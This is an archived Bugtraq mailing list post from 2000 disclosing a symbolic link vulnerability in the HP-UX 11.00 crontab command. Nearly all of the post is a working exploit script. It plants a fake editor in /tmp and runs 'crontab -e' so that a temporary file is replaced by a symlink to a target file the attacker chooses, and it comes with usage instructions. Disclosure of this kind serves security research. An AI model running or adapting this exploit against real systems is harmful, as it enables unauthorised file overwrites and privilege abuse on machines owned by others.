Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

HP-UX crontab exploit

From: Kyong-won Cho <dubhe () HACKERSLAB COM>
Date: Tue, 24 Oct 2000 10:03:04 +0900
[ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link
vulnerability

Attach

====================== crontab.sh ================================

#!/bin/sh
#
#  HP-UX 11.00 crontab
#
#  Kyong-won,Cho
#
#             dubhe () hackerslab com
#
#  Usage : ./crontab.sh <distfile>
#
#

if [ -z "$1" ]
then

echo "Usage : $0 <distfile>"
exit

fi

cat << _EOF_ > /tmp/crontab_exp
#!/bin/sh

ln -sf $1 \$1

_EOF_

chmod 755 /tmp/crontab_exp

EDITOR=/tmp/crontab_exp
export EDITOR

crontab -e 2> /tmp/crontab$$

grep -v "error on previous line" /tmp/crontab$$

rm -f /tmp/crontab_exp /tmp/crontab$$


==================================================end
Previous By Date Next
Previous By Thread Next

Current thread: